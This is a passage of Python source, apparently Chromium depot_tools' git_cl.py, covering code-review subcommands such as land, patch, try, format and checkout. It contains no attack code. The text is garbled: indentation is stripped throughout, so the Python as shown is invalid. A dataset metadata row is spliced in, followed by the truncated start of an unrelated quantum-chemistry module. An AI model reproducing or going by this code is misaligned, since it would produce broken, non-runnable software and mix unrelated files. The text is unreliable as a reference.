pushed_to_pending = (retcode == 0)
if retcode == 0:
revision = RunGit(['rev-parse', 'HEAD']).strip()
else:
# dcommit the merge branch.
cmd_args = [
'svn', 'dcommit',
'-C%s' % options.similarity,
'--no-rebase', '--rmdir',
]
if settings.GetForceHttpsCommitUrl():
# Allow forcing https commit URLs for some projects that don't allow
# committing to http URLs (like Google Code).
remote_url = cl.GetGitSvnRemoteUrl()
if urlparse.urlparse(remote_url).scheme == 'http':
remote_url = remote_url.replace('http://', 'https://')
cmd_args.append('--commit-url=%s' % remote_url)
_, output = RunGitWithCode(cmd_args)
if 'Committed r' in output:
revision = re.match(
'.*?\nCommitted r(\\d+)', output, re.DOTALL).group(1)
logging.debug(output)
finally:
# And then swap back to the original branch and clean up.
RunGit(['checkout', '-q', cl.GetBranch()])
RunGit(['branch', '-D', MERGE_BRANCH])
if base_has_submodules:
RunGit(['branch', '-D', CHERRY_PICK_BRANCH])
if not revision:
print('Failed to push. If this persists, please file a bug.')
return 1
killed = False
if pushed_to_pending:
try:
revision = WaitForRealCommit(remote, revision, base_branch, branch)
# We set pushed_to_pending to False, since it made it all the way to the
# real ref.
pushed_to_pending = False
except KeyboardInterrupt:
killed = True
if cl.GetIssue():
to_pending = ' to pending queue' if pushed_to_pending else ''
viewvc_url = settings.GetViewVCUrl()
if not to_pending:
if viewvc_url and revision:
change_desc.append_footer(
'Committed: %s%s' % (viewvc_url, revision))
elif revision:
change_desc.append_footer('Committed: %s' % (revision,))
print('Closing issue '
'(you may be prompted for your codereview password)...')
cl.UpdateDescription(change_desc.description)
cl.CloseIssue()
props = cl.GetIssueProperties()
patch_num = len(props['patchsets'])
comment = "Committed patchset #%d (id:%d)%s manually as %s" % (
patch_num, props['patchsets'][-1], to_pending, revision)
if options.bypass_hooks:
comment += ' (tree was closed).' if GetTreeStatus() == 'closed' else '.'
else:
comment += ' (presubmit successful).'
cl.RpcServer().add_comment(cl.GetIssue(), comment)
cl.SetIssue(None)
if pushed_to_pending:
_, branch = cl.FetchUpstreamTuple(cl.GetBranch())
print('The commit is in the pending queue (%s).' % pending_ref)
print('It will show up on %s in ~1 min, once it gets a Cr-Commit-Position '
'footer.' % branch)
hook = POSTUPSTREAM_HOOK_PATTERN % cmd
if os.path.isfile(hook):
RunCommand([hook, merge_base], error_ok=True)
return 1 if killed else 0
def WaitForRealCommit(remote, pushed_commit, local_base_ref, real_ref):
print()
print('Waiting for commit to be landed on %s...' % real_ref)
print('(If you are impatient, you may Ctrl-C once without harm)')
target_tree = RunGit(['rev-parse', '%s:' % pushed_commit]).strip()
current_rev = RunGit(['rev-parse', local_base_ref]).strip()
mirror = settings.GetGitMirror(remote)
loop = 0
while True:
sys.stdout.write('fetching (%d)... \r' % loop)
sys.stdout.flush()
loop += 1
if mirror:
mirror.populate()
RunGit(['retry', 'fetch', remote, real_ref], stderr=subprocess2.VOID)
to_rev = RunGit(['rev-parse', 'FETCH_HEAD']).strip()
commits = RunGit(['rev-list', '%s..%s' % (current_rev, to_rev)])
for commit in commits.splitlines():
if RunGit(['rev-parse', '%s:' % commit]).strip() == target_tree:
print('Found commit on %s' % real_ref)
return commit
current_rev = to_rev
def PushToGitPending(remote, pending_ref, upstream_ref):
"""Fetches pending_ref, cherry-picks current HEAD on top of it, pushes.
Returns:
(retcode of last operation, output log of last operation).
"""
assert pending_ref.startswith('refs/'), pending_ref
local_pending_ref = 'refs/git-cl/' + pending_ref[len('refs/'):]
cherry = RunGit(['rev-parse', 'HEAD']).strip()
code = 0
out = ''
max_attempts = 3
attempts_left = max_attempts
while attempts_left:
if attempts_left != max_attempts:
print('Retrying, %d attempts left...' % (attempts_left - 1,))
attempts_left -= 1
# Fetch. Retry fetch errors.
print('Fetching pending ref %s...' % pending_ref)
code, out = RunGitWithCode(
['retry', 'fetch', remote, '+%s:%s' % (pending_ref, local_pending_ref)])
if code:
print('Fetch failed with exit code %d.' % code)
if out.strip():
print(out.strip())
continue
# Try to cherry pick. Abort on merge conflicts.
print('Cherry-picking commit on top of pending ref...')
RunGitWithCode(['checkout', local_pending_ref], suppress_stderr=True)
code, out = RunGitWithCode(['cherry-pick', cherry])
if code:
print('Your patch doesn\'t apply cleanly to ref \'%s\', '
'the following files have merge conflicts:' % pending_ref)
print(RunGit(['diff', '--name-status', '--diff-filter=U']).strip())
print('Please rebase your patch and try again.')
RunGitWithCode(['cherry-pick', '--abort'])
return code, out
# Applied cleanly, try to push now. Retry on error (flake or non-ff push).
print('Pushing commit to %s... It can take a while.' % pending_ref)
code, out = RunGitWithCode(
['retry', 'push', '--porcelain', remote, 'HEAD:%s' % pending_ref])
if code == 0:
# Success.
print('Commit pushed to pending ref successfully!')
return code, out
print('Push failed with exit code %d.' % code)
if out.strip():
print(out.strip())
if IsFatalPushFailure(out):
print('Fatal push error. Make sure your .netrc credentials and git '
'user.email are correct and you have push access to the repo.')
return code, out
print('All attempts to push to pending ref failed.')
return code, out
def IsFatalPushFailure(push_stdout):
"""True if retrying push won't help."""
return '(prohibited by Gerrit)' in push_stdout
@subcommand.usage('[upstream branch to apply against]')
def CMDdcommit(parser, args):
"""Commits the current changelist via git-svn."""
if not settings.GetIsGitSvn():
if git_footers.get_footer_svn_id():
# If it looks like previous commits were mirrored with git-svn.
message = """This repository appears to be a git-svn mirror, but no
upstream SVN master is set. You probably need to run 'git auto-svn' once."""
else:
message = """This doesn't appear to be an SVN repository.
If your project has a true, writeable git repository, you probably want to run
'git cl land' instead.
If your project has a git mirror of an upstream SVN master, you probably need
to run 'git svn init'.
Using the wrong command might cause your commit to appear to succeed, and the
review to be closed, without actually landing upstream. If you choose to
proceed, please verify that the commit lands upstream as expected."""
print(message)
ask_for_data('[Press enter to dcommit or ctrl-C to quit]')
# TODO(tandrii): kill this post SVN migration with
# https://codereview.chromium.org/2076683002
print('WARNING: chrome infrastructure is migrating SVN repos to Git.\n'
'Please let us know of this project you are committing to:'
' http://crbug.com/600451')
return SendUpstream(parser, args, 'dcommit')
@subcommand.usage('[upstream branch to apply against]')
def CMDland(parser, args):
"""Commits the current changelist via git."""
if settings.GetIsGitSvn() or git_footers.get_footer_svn_id():
print('This appears to be an SVN repository.')
print('Are you sure you didn\'t mean \'git cl dcommit\'?')
print('(Ignore if this is the first commit after migrating from svn->git)')
ask_for_data('[Press enter to push or ctrl-C to quit]')
return SendUpstream(parser, args, 'land')
@subcommand.usage('<patch url or issue id or issue url>')
def CMDpatch(parser, args):
"""Patches in a code review."""
parser.add_option('-b', dest='newbranch',
help='create a new branch off trunk for the patch')
parser.add_option('-f', '--force', action='store_true',
help='with -b, clobber any existing branch')
parser.add_option('-d', '--directory', action='store', metavar='DIR',
help='Change to the directory DIR immediately, '
'before doing anything else. Rietveld only.')
parser.add_option('--reject', action='store_true',
help='failed patches spew .rej files rather than '
'attempting a 3-way merge. Rietveld only.')
parser.add_option('-n', '--no-commit', action='store_true', dest='nocommit',
help='don\'t commit after patch applies. Rietveld only.')
group = optparse.OptionGroup(
parser,
'Options for continuing work on the current issue uploaded from a '
'different clone (e.g. different machine). Must be used independently '
'from the other options. No issue number should be specified, and the '
'branch must have an issue number associated with it')
group.add_option('--reapply', action='store_true', dest='reapply',
help='Reset the branch and reapply the issue.\n'
'CAUTION: This will undo any local changes in this '
'branch')
group.add_option('--pull', action='store_true', dest='pull',
help='Performs a pull before reapplying.')
parser.add_option_group(group)
auth.add_auth_options(parser)
_add_codereview_select_options(parser)
(options, args) = parser.parse_args(args)
_process_codereview_select_options(parser, options)
auth_config = auth.extract_auth_config_from_options(options)
  if options.reapply:
if options.newbranch:
parser.error('--reapply works on the current branch only')
if len(args) > 0:
parser.error('--reapply implies no additional arguments')
cl = Changelist(auth_config=auth_config,
codereview=options.forced_codereview)
if not cl.GetIssue():
parser.error('current branch must have an associated issue')
upstream = cl.GetUpstreamBranch()
    if upstream is None:
parser.error('No upstream branch specified. Cannot reset branch')
RunGit(['reset', '--hard', upstream])
if options.pull:
RunGit(['pull'])
return cl.CMDPatchIssue(cl.GetIssue(), options.reject, options.nocommit,
options.directory)
if len(args) != 1 or not args[0]:
parser.error('Must specify issue number or url')
# We don't want uncommitted changes mixed up with the patch.
if git_common.is_dirty_git_tree('patch'):
return 1
if options.newbranch:
if options.force:
RunGit(['branch', '-D', options.newbranch],
stderr=subprocess2.PIPE, error_ok=True)
RunGit(['new-branch', options.newbranch])
cl = Changelist(auth_config=auth_config, codereview=options.forced_codereview)
if cl.IsGerrit():
if options.reject:
parser.error('--reject is not supported with Gerrit codereview.')
if options.nocommit:
parser.error('--nocommit is not supported with Gerrit codereview.')
if options.directory:
parser.error('--directory is not supported with Gerrit codereview.')
return cl.CMDPatchIssue(args[0], options.reject, options.nocommit,
options.directory)
def CMDrebase(parser, args):
"""Rebases current branch on top of svn repo."""
# Provide a wrapper for git svn rebase to help avoid accidental
# git svn dcommit.
# It's the only command that doesn't use parser at all since we just defer
# execution to git-svn.
return RunGitWithCode(['svn', 'rebase'] + args)[1]
def GetTreeStatus(url=None):
"""Fetches the tree status and returns either 'open', 'closed',
'unknown' or 'unset'."""
url = url or settings.GetTreeStatusUrl(error_ok=True)
if url:
status = urllib2.urlopen(url).read().lower()
if status.find('closed') != -1 or status == '0':
return 'closed'
elif status.find('open') != -1 or status == '1':
return 'open'
return 'unknown'
return 'unset'
def GetTreeStatusReason():
"""Fetches the tree status from a json url and returns the message
with the reason for the tree to be opened or closed."""
url = settings.GetTreeStatusUrl()
json_url = urlparse.urljoin(url, '/current?format=json')
connection = urllib2.urlopen(json_url)
status = json.loads(connection.read())
connection.close()
return status['message']
def GetBuilderMaster(bot_list):
"""For a given builder, fetch the master from AE if available."""
map_url = 'https://builders-map.appspot.com/'
try:
master_map = json.load(urllib2.urlopen(map_url))
except urllib2.URLError as e:
return None, ('Failed to fetch builder-to-master map from %s. Error: %s.' %
(map_url, e))
except ValueError as e:
return None, ('Invalid json string from %s. Error: %s.' % (map_url, e))
if not master_map:
return None, 'Failed to build master map.'
result_master = ''
for bot in bot_list:
builder = bot.split(':', 1)[0]
master_list = master_map.get(builder, [])
if not master_list:
return None, ('No matching master for builder %s.' % builder)
elif len(master_list) > 1:
return None, ('The builder name %s exists in multiple masters %s.' %
(builder, master_list))
else:
cur_master = master_list[0]
if not result_master:
result_master = cur_master
elif result_master != cur_master:
return None, 'The builders do not belong to the same master.'
return result_master, None
def CMDtree(parser, args):
"""Shows the status of the tree."""
_, args = parser.parse_args(args)
status = GetTreeStatus()
if 'unset' == status:
print('You must configure your tree status URL by running "git cl config".')
return 2
print('The tree is %s' % status)
print()
print(GetTreeStatusReason())
if status != 'open':
return 1
return 0
def CMDtry(parser, args):
"""Triggers try jobs through BuildBucket."""
group = optparse.OptionGroup(parser, "Try job options")
group.add_option(
"-b", "--bot", action="append",
help=("IMPORTANT: specify ONE builder per --bot flag. Use it multiple "
"times to specify multiple builders. ex: "
"'-b win_rel -b win_layout'. See "
"the try server waterfall for the builders name and the tests "
"available."))
group.add_option(
"-m", "--master", default='',
help=("Specify a try master where to run the tries."))
  group.add_option("--luci", action='store_true')
group.add_option(
"-r", "--revision",
help="Revision to use for the try job; default: the "
"revision will be determined by the try server; see "
"its waterfall for more info")
group.add_option(
"-c", "--clobber", action="store_true", default=False,
help="Force a clobber before building; e.g. don't do an "
"incremental build")
group.add_option(
"--project",
help="Override which project to use. Projects are defined "
"server-side to define what default bot set to use")
group.add_option(
"-p", "--property", dest="properties", action="append", default=[],
help="Specify generic properties in the form -p key1=value1 -p "
"key2=value2 etc (buildbucket only). The value will be treated as "
"json if decodable, or as string otherwise.")
group.add_option(
"-n", "--name", help="Try job name; default to current branch name")
group.add_option(
"--use-rietveld", action="store_true", default=False,
help="Use Rietveld to trigger try jobs.")
group.add_option(
"--buildbucket-host", default='cr-buildbucket.appspot.com',
help="Host of buildbucket. The default host is %default.")
parser.add_option_group(group)
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if options.use_rietveld and options.properties:
parser.error('Properties can only be specified with buildbucket')
# Make sure that all properties are prop=value pairs.
bad_params = [x for x in options.properties if '=' not in x]
if bad_params:
parser.error('Got properties with missing "=": %s' % bad_params)
if args:
parser.error('Unknown arguments: %s' % args)
cl = Changelist(auth_config=auth_config)
if not cl.GetIssue():
parser.error('Need to upload first')
if cl.IsGerrit():
parser.error(
'Not yet supported for Gerrit (http://crbug.com/599931).\n'
'If your project has Commit Queue, dry run is a workaround:\n'
' git cl set-commit --dry-run')
# Code below assumes Rietveld issue.
# TODO(tandrii): actually implement for Gerrit http://crbug.com/599931.
props = cl.GetIssueProperties()
if props.get('closed'):
parser.error('Cannot send tryjobs for a closed CL')
if props.get('private'):
parser.error('Cannot use trybots with private issue')
if not options.name:
options.name = cl.GetBranch()
if options.bot and not options.master:
options.master, err_msg = GetBuilderMaster(options.bot)
if err_msg:
parser.error('Tryserver master cannot be found because: %s\n'
'Please manually specify the tryserver master'
', e.g. "-m tryserver.chromium.linux".' % err_msg)
def GetMasterMap():
# Process --bot.
if not options.bot:
change = cl.GetChange(cl.GetCommonAncestorWithUpstream(), None)
# Get try masters from PRESUBMIT.py files.
masters = presubmit_support.DoGetTryMasters(
change,
change.LocalPaths(),
settings.GetRoot(),
None,
None,
options.verbose,
sys.stdout)
if masters:
return masters
# Fall back to deprecated method: get try slaves from PRESUBMIT.py files.
options.bot = presubmit_support.DoGetTrySlaves(
change,
change.LocalPaths(),
settings.GetRoot(),
None,
None,
options.verbose,
sys.stdout)
if not options.bot:
# Get try masters from cq.cfg if any.
# TODO(tandrii): some (but very few) projects store cq.cfg in different
# location.
cq_cfg = os.path.join(change.RepositoryRoot(),
'infra', 'config', 'cq.cfg')
if os.path.exists(cq_cfg):
masters = {}
cq_masters = commit_queue.get_master_builder_map(
cq_cfg, include_experimental=False, include_triggered=False)
for master, builders in cq_masters.iteritems():
for builder in builders:
# Skip presubmit builders, because these will fail without LGTM.
masters.setdefault(master, {})[builder] = ['defaulttests']
if masters:
print('Loaded default bots from CQ config (%s)' % cq_cfg)
return masters
else:
print('CQ config exists (%s) but has no try bots listed' % cq_cfg)
if not options.bot:
parser.error('No default try builder to try, use --bot')
builders_and_tests = {}
# TODO(machenbach): The old style command-line options don't support
# multiple try masters yet.
old_style = filter(lambda x: isinstance(x, basestring), options.bot)
new_style = filter(lambda x: isinstance(x, tuple), options.bot)
for bot in old_style:
if ':' in bot:
parser.error('Specifying testfilter is no longer supported')
elif ',' in bot:
parser.error('Specify one bot per --bot flag')
else:
builders_and_tests.setdefault(bot, [])
for bot, tests in new_style:
builders_and_tests.setdefault(bot, []).extend(tests)
# Return a master map with one master to be backwards compatible. The
# master name defaults to an empty string, which will cause the master
# not to be set on rietveld (deprecated).
return {options.master: builders_and_tests}
masters = GetMasterMap()
for builders in masters.itervalues():
if any('triggered' in b for b in builders):
print('ERROR You are trying to send a job to a triggered bot. This type '
'of bot requires an\ninitial job from a parent (usually a builder).'
' Instead send your job to the parent.\n'
'Bot list: %s' % builders, file=sys.stderr)
return 1
patchset = cl.GetMostRecentPatchset()
if patchset and patchset != cl.GetPatchset():
print(
'\nWARNING Mismatch between local config and server. Did a previous '
'upload fail?\ngit-cl try always uses latest patchset from rietveld. '
'Continuing using\npatchset %s.\n' % patchset)
if options.luci:
trigger_luci_job(cl, masters, options)
elif not options.use_rietveld:
try:
trigger_try_jobs(auth_config, cl, options, masters, 'git_cl_try')
except BuildbucketResponseException as ex:
print('ERROR: %s' % ex)
return 1
except Exception as e:
stacktrace = (''.join(traceback.format_stack()) + traceback.format_exc())
print('ERROR: Exception when trying to trigger tryjobs: %s\n%s' %
(e, stacktrace))
return 1
else:
try:
cl.RpcServer().trigger_distributed_try_jobs(
cl.GetIssue(), patchset, options.name, options.clobber,
options.revision, masters)
except urllib2.HTTPError as e:
if e.code == 404:
print('404 from rietveld; '
'did you mean to use "git try" instead of "git cl try"?')
return 1
print('Tried jobs on:')
for (master, builders) in sorted(masters.iteritems()):
if master:
print('Master: %s' % master)
length = max(len(builder) for builder in builders)
for builder in sorted(builders):
print(' %*s: %s' % (length, builder, ','.join(builders[builder])))
return 0
def CMDtry_results(parser, args):
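  """Prints info about try jobs associated with current CL."""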
group = optparse.OptionGroup(parser, "Try job results options")
group.add_option(
"-p", "--patchset", type=int, help="patchset number if not current.")
group.add_option(
"--print-master", action='store_true', help="print master name as well.")
group.add_option(
"--color", action='store_true', default=setup_color.IS_TTY,
help="force color output, useful when piping output.")
group.add_option(
"--buildbucket-host", default='cr-buildbucket.appspot.com',
help="Host of buildbucket. The default host is %default.")
parser.add_option_group(group)
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
auth_config = auth.extract_auth_config_from_options(options)
cl = Changelist(auth_config=auth_config)
if not cl.GetIssue():
parser.error('Need to upload first')
if not options.patchset:
options.patchset = cl.GetMostRecentPatchset()
if options.patchset and options.patchset != cl.GetPatchset():
print(
'\nWARNING Mismatch between local config and server. Did a previous '
'upload fail?\ngit-cl try always uses latest patchset from rietveld. '
'Continuing using\npatchset %s.\n' % options.patchset)
try:
jobs = fetch_try_jobs(auth_config, cl, options)
except BuildbucketResponseException as ex:
print('Buildbucket error: %s' % ex)
return 1
except Exception as e:
stacktrace = (''.join(traceback.format_stack()) + traceback.format_exc())
print('ERROR: Exception when trying to fetch tryjobs: %s\n%s' %
(e, stacktrace))
return 1
print_tryjobs(options, jobs)
return 0
@subcommand.usage('[new upstream branch]')
def CMDupstream(parser, args):
"""Prints or sets the name of the upstream branch, if any."""
_, args = parser.parse_args(args)
if len(args) > 1:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist()
if args:
# One arg means set upstream branch.
branch = cl.GetBranch()
RunGit(['branch', '--set-upstream', branch, args[0]])
cl = Changelist()
print('Upstream branch set to %s' % (cl.GetUpstreamBranch(),))
# Clear configured merge-base, if there is one.
git_common.remove_merge_base(branch)
else:
print(cl.GetUpstreamBranch())
return 0
def CMDweb(parser, args):
"""Opens the current CL in the web browser."""
_, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
issue_url = Changelist().GetIssueURL()
if not issue_url:
print('ERROR No issue to open', file=sys.stderr)
return 1
webbrowser.open(issue_url)
return 0
def CMDset_commit(parser, args):
"""Sets the commit bit to trigger the Commit Queue."""
parser.add_option('-d', '--dry-run', action='store_true',
help='trigger in dry run mode')
parser.add_option('-c', '--clear', action='store_true',
help='stop CQ run, if any')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
if options.dry_run and options.clear:
parser.error('Make up your mind: both --dry-run and --clear not allowed')
cl = Changelist(auth_config=auth_config)
if options.clear:
state = _CQState.CLEAR
elif options.dry_run:
state = _CQState.DRY_RUN
else:
state = _CQState.COMMIT
if not cl.GetIssue():
parser.error('Must upload the issue first')
cl.SetCQState(state)
return 0
def CMDset_close(parser, args):
"""Closes the issue."""
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist(auth_config=auth_config)
# Ensure there actually is an issue to close.
cl.GetDescription()
cl.CloseIssue()
return 0
def CMDdiff(parser, args):
"""Shows differences between local tree and last upload."""
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
# Uncommitted (staged and unstaged) changes will be destroyed by
# "git reset --hard" if there are merging conflicts in CMDPatchIssue().
# Staged changes would be committed along with the patch from last
# upload, hence counted toward the "last upload" side in the final
# diff output, and this is not what we want.
if git_common.is_dirty_git_tree('diff'):
return 1
cl = Changelist(auth_config=auth_config)
issue = cl.GetIssue()
branch = cl.GetBranch()
if not issue:
DieWithError('No issue found for current branch (%s)' % branch)
TMP_BRANCH = 'git-cl-diff'
base_branch = cl.GetCommonAncestorWithUpstream()
# Create a new branch based on the merge-base
RunGit(['checkout', '-q', '-b', TMP_BRANCH, base_branch])
# Clear cached branch in cl object, to avoid overwriting original CL branch
# properties.
cl.ClearBranch()
try:
rtn = cl.CMDPatchIssue(issue, reject=False, nocommit=False, directory=None)
if rtn != 0:
RunGit(['reset', '--hard'])
return rtn
# Switch back to starting branch and diff against the temporary
# branch containing the latest rietveld patch.
subprocess2.check_call(['git', 'diff', TMP_BRANCH, branch, '--'])
finally:
RunGit(['checkout', '-q', branch])
RunGit(['branch', '-D', TMP_BRANCH])
return 0
def CMDowners(parser, args):
"""Interactively find the owners for reviewing."""
parser.add_option(
'--no-color',
action='store_true',
help='Use this option to disable color output')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
author = RunGit(['config', 'user.email']).strip() or None
cl = Changelist(auth_config=auth_config)
if args:
if len(args) > 1:
parser.error('Unknown args')
base_branch = args[0]
else:
# Default to diffing against the common ancestor of the upstream branch.
base_branch = cl.GetCommonAncestorWithUpstream()
change = cl.GetChange(base_branch, None)
return owners_finder.OwnersFinder(
[f.LocalPath() for f in
cl.GetChange(base_branch, None).AffectedFiles()],
change.RepositoryRoot(), author,
fopen=file, os_path=os.path, glob=glob.glob,
disable_color=options.no_color).run()
def BuildGitDiffCmd(diff_type, upstream_commit, args):
"""Generates a diff command."""
# Generate diff for the current branch's changes.
diff_cmd = ['diff', '--no-ext-diff', '--no-prefix', diff_type,
upstream_commit, '--' ]
if args:
for arg in args:
if os.path.isdir(arg) or os.path.isfile(arg):
diff_cmd.append(arg)
else:
DieWithError('Argument "%s" is not a file or a directory' % arg)
return diff_cmd
def MatchingFileType(file_name, extensions):
"""Returns true if the file name ends with one of the given extensions."""
return bool([ext for ext in extensions if file_name.lower().endswith(ext)])
@subcommand.usage('[files or directories to diff]')
def CMDformat(parser, args):
"""Runs auto-formatting tools (clang-format etc.) on the diff."""
CLANG_EXTS = ['.cc', '.cpp', '.h', '.mm', '.proto', '.java']
GN_EXTS = ['.gn', '.gni', '.typemap']
parser.add_option('--full', action='store_true',
help='Reformat the full content of all touched files')
parser.add_option('--dry-run', action='store_true',
help='Don\'t modify any file on disk.')
parser.add_option('--python', action='store_true',
help='Format python code with yapf (experimental).')
parser.add_option('--diff', action='store_true',
help='Print diff to stdout rather than modifying files.')
opts, args = parser.parse_args(args)
# git diff generates paths against the root of the repository. Change
# to that directory so clang-format can find files even within subdirs.
rel_base_path = settings.GetRelativeRoot()
if rel_base_path:
os.chdir(rel_base_path)
# Grab the merge-base commit, i.e. the upstream commit of the current
# branch when it was created or the last time it was rebased. This is
# to cover the case where the user may have called "git fetch origin",
# moving the origin branch to a newer commit, but hasn't rebased yet.
upstream_commit = None
cl = Changelist()
upstream_branch = cl.GetUpstreamBranch()
if upstream_branch:
upstream_commit = RunGit(['merge-base', 'HEAD', upstream_branch])
upstream_commit = upstream_commit.strip()
if not upstream_commit:
DieWithError('Could not find base commit for this branch. '
'Are you in detached state?')
changed_files_cmd = BuildGitDiffCmd('--name-only', upstream_commit, args)
diff_output = RunGit(changed_files_cmd)
diff_files = diff_output.splitlines()
# Filter out files deleted by this CL
diff_files = [x for x in diff_files if os.path.isfile(x)]
clang_diff_files = [x for x in diff_files if MatchingFileType(x, CLANG_EXTS)]
python_diff_files = [x for x in diff_files if MatchingFileType(x, ['.py'])]
dart_diff_files = [x for x in diff_files if MatchingFileType(x, ['.dart'])]
gn_diff_files = [x for x in diff_files if MatchingFileType(x, GN_EXTS)]
top_dir = os.path.normpath(
RunGit(["rev-parse", "--show-toplevel"]).rstrip('\n'))
# Set to 2 to signal to CheckPatchFormatted() that this patch isn't
# formatted. This is used to block during the presubmit.
return_value = 0
if clang_diff_files:
# Locate the clang-format binary in the checkout
try:
clang_format_tool = clang_format.FindClangFormatToolInChromiumTree()
except clang_format.NotFoundError as e:
DieWithError(e)
if opts.full:
cmd = [clang_format_tool]
if not opts.dry_run and not opts.diff:
cmd.append('-i')
stdout = RunCommand(cmd + clang_diff_files, cwd=top_dir)
if opts.diff:
sys.stdout.write(stdout)
else:
env = os.environ.copy()
env['PATH'] = str(os.path.dirname(clang_format_tool))
try:
script = clang_format.FindClangFormatScriptInChromiumTree(
'clang-format-diff.py')
except clang_format.NotFoundError as e:
DieWithError(e)
cmd = [sys.executable, script, '-p0']
if not opts.dry_run and not opts.diff:
cmd.append('-i')
diff_cmd = BuildGitDiffCmd('-U0', upstream_commit, clang_diff_files)
diff_output = RunGit(diff_cmd)
stdout = RunCommand(cmd, stdin=diff_output, cwd=top_dir, env=env)
if opts.diff:
sys.stdout.write(stdout)
if opts.dry_run and len(stdout) > 0:
return_value = 2
# Similar code to above, but using yapf on .py files rather than clang-format
# on C/C++ files
if opts.python:
yapf_tool = gclient_utils.FindExecutable('yapf')
if yapf_tool is None:
DieWithError('yapf not found in PATH')
if opts.full:
if python_diff_files:
cmd = [yapf_tool]
if not opts.dry_run and not opts.diff:
cmd.append('-i')
stdout = RunCommand(cmd + python_diff_files, cwd=top_dir)
if opts.diff:
sys.stdout.write(stdout)
else:
# TODO(sbc): yapf --lines mode still has some issues.
# https://github.com/google/yapf/issues/154
DieWithError('--python currently only works with --full')
# Dart's formatter does not have the nice property of only operating on
# modified chunks, so hard code full.
if dart_diff_files:
try:
command = [dart_format.FindDartFmtToolInChromiumTree()]
if not opts.dry_run and not opts.diff:
command.append('-w')
command.extend(dart_diff_files)
stdout = RunCommand(command, cwd=top_dir)
if opts.dry_run and stdout:
return_value = 2
except dart_format.NotFoundError as e:
print('Warning: Unable to check Dart code formatting. Dart SDK not '
'found in this checkout. Files in other languages are still '
'formatted.')
# Format GN build files. Always run on full build files for canonical form.
if gn_diff_files:
cmd = ['gn', 'format']
if not opts.dry_run and not opts.diff:
cmd.append('--in-place')
for gn_diff_file in gn_diff_files:
stdout = RunCommand(cmd + [gn_diff_file],
shell=sys.platform == 'win32',
cwd=top_dir)
if opts.diff:
sys.stdout.write(stdout)
return return_value
@subcommand.usage('<codereview url or issue id>')
def CMDcheckout(parser, args):
"""Checks out a branch associated with a given Rietveld or Gerrit issue."""
_, args = parser.parse_args(args)
if len(args) != 1:
parser.print_help()
return 1
issue_arg = ParseIssueNumberArgument(args[0])
if not issue_arg.valid:
parser.print_help()
return 1
target_issue = str(issue_arg.issue)
def find_issues(issueprefix):
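    # Scan local git config for branch.<name>.<issueprefix> entries and yield
    # the branch names whose stored issue matches the requested one.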
output = RunGit(['config', '--local', '--get-regexp',
r'branch\..*\.%s' % issueprefix],
error_ok=True)
for key, issue in [x.split() for x in output.splitlines()]:
if issue == target_issue:
yield re.sub(r'branch\.(.*)\.%s' % issueprefix, r'\1', key)
branches = []
for cls in _CODEREVIEW_IMPLEMENTATIONS.values():
branches.extend(find_issues(cls.IssueSettingSuffix()))
if len(branches) == 0:
print('No branch found for issue %s.' % target_issue)
return 1
if len(branches) == 1:
RunGit(['checkout', branches[0]])
else:
print('Multiple branches match issue %s:' % target_issue)
for i in range(len(branches)):
print('%d: %s' % (i, branches[i]))
which = raw_input('Choose by index: ')
try:
RunGit(['checkout', branches[int(which)]])
except (IndexError, ValueError):
print('Invalid selection, not checking out any branch.')
return 1
return 0
def CMDlol(parser, args):
# This command is intentionally undocumented.
print(zlib.decompress(base64.b64decode(
'eNptkLEOwyAMRHe+wupCIqW57v0Vq84WqWtXyrcXnCBsmgMJ+/SSAxMZgRB6NzE'
'E2ObgCKJooYdu4uAQVffUEoE1sRQLxAcqzd7uK2gmStrll1ucV3uZyaY5sXyDd9'
'JAnN+lAXsOMJ90GANAi43mq5/VeeacylKVgi8o6F1SC63FxnagHfJUTfUYdCR/W'
'Ofe+0dHL7PicpytKP750Fh1q2qnLVof4w8OZWNY')))
return 0
class OptionParser(optparse.OptionParser):
  """Creates the option parser and adds --verbose support."""
def __init__(self, *args, **kwargs):
optparse.OptionParser.__init__(
self, *args, prog='git cl', version=__version__, **kwargs)
self.add_option(
'-v', '--verbose', action='count', default=0,
help='Use 2 times for more debugging info')
def parse_args(self, args=None, values=None):
options, args = optparse.OptionParser.parse_args(self, args, values)
levels = [logging.WARNING, logging.INFO, logging.DEBUG]
logging.basicConfig(level=levels[min(options.verbose, len(levels) - 1)])
return options, args
def main(argv):
if sys.hexversion < 0x02060000:
print('\nYour python version %s is unsupported, please upgrade.\n' %
(sys.version.split(' ', 1)[0],), file=sys.stderr)
return 2
# Reload settings.
global settings
settings = Settings()
colorize_CMDstatus_doc()
dispatcher = subcommand.CommandDispatcher(__name__)
try:
return dispatcher.execute(OptionParser(), argv)
except auth.AuthenticationError as e:
DieWithError(str(e))
except urllib2.HTTPError as e:
if e.code != 500:
raise
DieWithError(
('AppEngine is misbehaving and returned HTTP %d, again. Keep faith '
'and retry or visit go/isgaeup.\n%s') % (e.code, str(e)))
return 0
if __name__ == '__main__':
# These affect sys.stdout so do it outside of main() to simplify mocks in
# unit testing.
fix_encoding.fix_encoding()
setup_color.init()
try:
sys.exit(main(sys.argv[1:]))
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
| 37.336608 | 80 | 0.654348 | [
"BSD-3-Clause"
] | wuyong2k/chromium_depot_tool | git_cl.py | 190,006 | Python |
import numpy as np
from hqca.core import *
from hqca.core.primitives import *
from hqca.tools import *
import sys
from numpy import sin as sin
from numpy import cos as cos
from copy import deepcopy as copy
class ExpPauli:
def __init__(self,vec):
v = np.asmatrix(vec)
if v.shape[0]>v.shape[1]:
v = v.T
if np.linalg.norm(v)==0:
self.iden=True
self.a = 0
self.v = v
else:
self.iden=False
